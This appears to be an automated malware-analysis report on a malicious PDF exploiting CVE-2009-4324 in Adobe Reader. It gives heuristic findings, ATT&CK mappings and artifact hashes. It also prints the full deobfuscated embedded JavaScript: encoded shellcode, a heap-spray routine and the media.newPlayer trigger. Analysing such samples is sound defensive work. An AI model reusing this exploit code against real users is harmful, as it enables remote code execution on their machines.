MALICIOUS
Risk Score: 260
Malware Insights
MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 JavaScript
The PDF file contains embedded JavaScript that exploits CVE-2009-4324 (media.newPlayer). The JavaScript is obfuscated using unescape() and String.fromCharCode() but was recovered and deobfuscated. The script's primary function is to download and execute a second-stage payload, indicated by the 'generic_stage_recovery' heuristic.
Machine Learning
- Nyx PDF Classifier malicious score 0.9966
Heuristics (8)
- media.newPlayer — CVE-2009-4324 (critical, CVE exact, rule CVE_2009_4324): PDF JavaScript calls media.newPlayer — CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- JavaScript action (low, 2 related findings, rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical, rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script:
  `var shellcode = unescape("??9090??9090??9090??9090??EB90??5E1a??5B56??068a??303c??1674??E0c0??4604??268a??E480??020f??88c4??4303??EB46??E8e9??FFe1??FFff"+"??484e??4040??4040??4040??4040??4a46??4c40??4b4e??4045??4047??4347??4f4e??4643??4849??4e4f??4a48??4e40??4c4a??4840??4a4d??4647??4348??494b??454b??4847??4d4a??4b49??4d47??4f4d??4b4f??4749??4d4f??4f40??4a4e??4944??4a48??484e??4b4d??4a48??4342??494e??4641??4546??4a4f??4041??464e??4741??4f48??4b47??464f??4242??494b??4c47??4c4e??4749??4340??4c40??4 …`
- Embedded JS stream (low, rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Object number defined twice with different bodies (info, rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact (info, rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs:
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
Extracted artifacts (3)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0054_000.js | pdf-javascript-stream | PDF /JS object 54 at offset 0x2F75 | 7866 bytes | 547843b34547a980f401cc8198c3783cbdfe1522d57e377e071cfd1ce8c76453 |
| stream_014_off00002f75.bin | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x2F75 | 3950 bytes | 0aa0245fc9510d5f24ddfc1a18c7ed488a28278fc4312c20359cf09f51a766dc |
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery null-collapse from JavaScript object 54 at offset 0x2F75 | 3943 bytes | 773c16ad426b1f1c071ab756ea57c02092f97472dc0e430fe05f9cc0f113716f |

javascript_obj0054_000.js
Preview script: the extracted bytes render with a null byte between characters, so the preview is the same document-level script that appears in null-collapsed form under generic_stage_recovery_000.js below.

stream_014_off00002f75.bin
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s))

generic_stage_recovery_000.js
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 4 eval/decoder/string-building token(s))
Preview script (first 1,000 lines of the extracted script):
//-------------------------------------------------------------
//-------------------------------------------------------------
//<Document-Level>
//<ACRO_source>dm</ACRO_source>
//<ACRO_script>
/*********** Document-Level:dm ***********/
dm();
function dm()
{
var shellcode = unescape("??9090??9090??9090??9090??EB90??5E1a??5B56??068a??303c??1674??E0c0??4604??268a??E480??020f??88c4??4303??EB46??E8e9??FFe1??FFff"+"??484e??4040??4040??4040??4040??4a46??4c40??4b4e??4045??4047??4347??4f4e??4643??4849??4e4f??4a48??4e40??4c4a??4840??4a4d??4647??4348??494b??454b??4847??4d4a??4b49??4d47??4f4d??4b4f??4749??4d4f??4f40??4a4e??4944??4a48??484e??4b4d??4a48??4342??494e??4641??4546??4a4f??4041??464e??4741??4f48??4b47??464f??4242??494b??4c47??4c4e??4749??4340??4c40??4346??4d46??4446??4042??4f42??4346??4042??4344??4a43??4c45??4144??4346??4247??4f46??4246??4146??4447??4e42??4546??4847??4546??4040??4040??4040??4040??4040??4040??4040??4040??4040??4040??4040??4945??4f45??4f4a??4746??4446??414a??4043??4040??4b48??4044??4c40??4b48??4047??4c41??4d4a??4b48??4846??4840??4145??4b48??4547??4c43??4b48??4447??4e42??4847??4340??454f??4645??4b48??4647??4042??4340??454f??4343??494c??4944??4144??4d4a??4340??454c??4343??4b4d??4f40??4e4b??4041??4843??424f??4447??4840??414c??4b4c??4d40??4340??4a4d??4044??4b4e??414f??4b43??4f41??4547??474e??4e45??4b48??4e45??4442??4340??4d4d??4646??4b48??4c40??4b44??4b48??4e45??4c41??4340??4d4d??4b48??4440??4b48??4340??454c??4b4a??4945??424e??4c4b??4348??4f4e??4843??4343??464f??4644??4d48??4744??4046??4045??4645??4f4f??4745??4841??4348??484f??4f4f??4447??424f??4d43??4040??4041??4040??4040??4647??4b4e??4948??4744??4440??4948??4747??4046??4f4f??4747??4440??4a46??4044??4f4f??4745??4443??4948??4744??4c45??4a46??4040??4a46??4040??4a46??4040??4f4f??4747??4046??4f4f??4745??4041??4348??484f??4f4f??4447??4b44??4a46??4040??4d48??4f45??4047??4345??4f4f??4747??4440??4f4f??4747??4c45??4f4f??4747??4046??4f4f??4745??4842??4b48??4f44??4047??4348??494e??4a40??4b48??4744??4c45??4044??4148??4843??4644??4645??4344??4b44??4547??4940??4148??4847??4440??4440??4640??4948??4941??4447??4440??424e??4c4e??4b4e??4a41??4348??404c??4840??4948??4744??4447??4044??4148??4843??4b44??4146??4b44??4146??4547??4940??4148??4847??4440??4640??4141??4148??4941??4447??4
e40??424e??4c4e??4f4f??4747??4c45??4f4f??4745??4043??4f40??4548??4247??4f4f??4f4f??4f4f??4948??4744??4847??4a46??4240??4d48??4747??4f43??4645??4f4f??4745??4042??4948??4740??4b48??4f45??4847??4b42??4f45??4447??4b48??4744??4447??4043??4841??4b44??4044??4348??4b4f??4040??4547??474f??4b48??4744??4847??4b42??4744??4447??4045??4f4f??4747??4447??4f4f??4743??4f4f??4745??4442??4f4f??4743??4f4f??4745??4c41??4f4f??4745??4840??4045??4b48??464d??4a48??4240??4244??4a40??404c??4447??4240??4b4e??474f??464c??4244??4f4f??4042??4945??4a48??4140??4a40??404c??4447??4640??4848??4240??4244??4144??4b4e??444f??4848??4240??4348??4e4e??4740??484e??4040??4040??4040??4040??4348??4440??4442??4d40??4a46??4040??4645??4f4f??4747??4c42??4f4f??4746??4c40??4a46??4040??4a46??4f4f??4f4f??4745??4441??3030");
re = /\?\?/g;
shellcode = shellcode.replace(re, "%u");
shellcode = unescape(shellcode);
bigblock = unescape("%u0c0c%u0c0c");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<=0x40000) block = block+block+fillblock;
memory = new Array(); for (i=0;i<200;i++) memory[i] = block + shellcode;
try {this.media.newPlayer(null);} catch(e) {}
util.printd(String.fromCharCode(2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570,2570), new Date());
}
//</ACRO_script>
//</Document-Level>